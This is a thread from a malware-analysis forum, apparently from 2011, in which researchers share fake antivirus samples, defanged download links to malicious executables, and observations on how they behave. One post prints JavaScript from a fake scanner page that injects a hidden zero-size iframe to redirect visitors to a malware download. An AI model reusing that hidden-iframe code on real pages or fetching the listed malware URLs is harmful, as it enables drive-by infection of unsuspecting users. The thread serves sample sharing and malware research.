A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #8536  by bitx
 Mon Sep 12, 2011 2:07 pm
System Recovery
Attachments
pass=malware
(377.13 KiB) Downloaded 77 times
Last edited by EP_X0FF on Mon Oct 31, 2011 7:24 am, edited 1 time in total. Reason: title edited
 #8537  by Xylitol
 Mon Sep 12, 2011 2:22 pm
security shield fake scanner
Code: Select all
hXXp://oorvyvwdeciphers.info/fast-scan/
function who conduct to redirect page for malware download, with hidden message 'fuck nod32'
function black(){
var f = '<iframe ';
var u = 'src="black.php" ';
var c = 'style="';
var k = 'width: 0px; ';
var n = 'height: 0px; ';
var o = 'border: 0px;';
var d32 = '"></iframe>';
document.getElementById('frame').innerHTML = f+u+c+k+n+o+d32;
}
 #8558  by bitx
 Wed Sep 14, 2011 9:06 am
Data Recovery
Attachments
pass=malware
(409.89 KiB) Downloaded 64 times
Last edited by EP_X0FF on Mon Oct 31, 2011 7:25 am, edited 2 times in total. Reason: title edited
 #8582  by Xylitol
 Fri Sep 16, 2011 7:29 am
Code: Select all
hXXp://www.lamatita.info/eee/scan/
Fake scan page, with Koobface as payload.
http://www.virustotal.com/file-scan/rep ... 1316157525

in attach the fake scanner page without koobface
Image
Attachments
pwd: xylibox
(77.45 KiB) Downloaded 62 times
 #8640  by rough_spear
 Mon Sep 19, 2011 6:23 pm
Hi All,
Fresh bunch of Fake AVs. 8-)

Web links -
hxxp://dw.wideon.co.kr/Setup/binc/WindowSystem_se.exe
hxxp://dw.wideon.co.kr/Setup/binc/WindowSystem_updater.exe
hxxp://dw.wideon.co.kr/WideOnSetup.exe
hxxp://dw.wideon.co.kr/Setup/binc/WindowSystem_uninstaller.exe
hxxp://soul-you.in/aslpatch10.exe
hxxp://down.vaccinescan.co.kr/app/partner_2010/vaccinescan_ancamera.exe
hxxp://update.speedboan.co.kr/bin/speedboan.exe
hxxp://update.speedboan.co.kr/bin/speedboanU.exe

Files :
WindowSystem_se.exe, WindowSystem_updater.exe, WideOnSetup.exe, WindowSystem_uninstaller.exe ===> 19-09-2011-FakeAVs-part01.7z

vaccinescan_ancamera.exe, speedboan.exe, speedboanU.exe ===> 19-09-2011-FakeAVs-part02.7z

aslpatch10.exe ===>19-09-2011-FakeAVs-part03.7z

Regards,


rough_spear. ;)
Attachments
File name - 19-09-2011-FakeAVs-part03.7z
password - malware.

(89.95 KiB) Downloaded 52 times
File name - 19-09-2011-FakeAVs-part02.7z
password - malware.

(4.45 MiB) Downloaded 53 times
File name - 19-09-2011-FakeAVs-part01.7z
password - malware.

(342.21 KiB) Downloaded 50 times
 #8680  by EP_X0FF
 Wed Sep 21, 2011 4:51 pm
rough_spear wrote:Hi, ;)
One more Fake AV.
This is Total Protect FakeAV written on dot net.

It is aggressive - terminating starting application with fake virus warning alerts - usual behavior for this type of FakeAV.

Image

Runs from X:\Documents and Settings\UserName\Application Data\

via

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • 1
  • 21
  • 22
  • 23
  • 24
  • 25
  • 34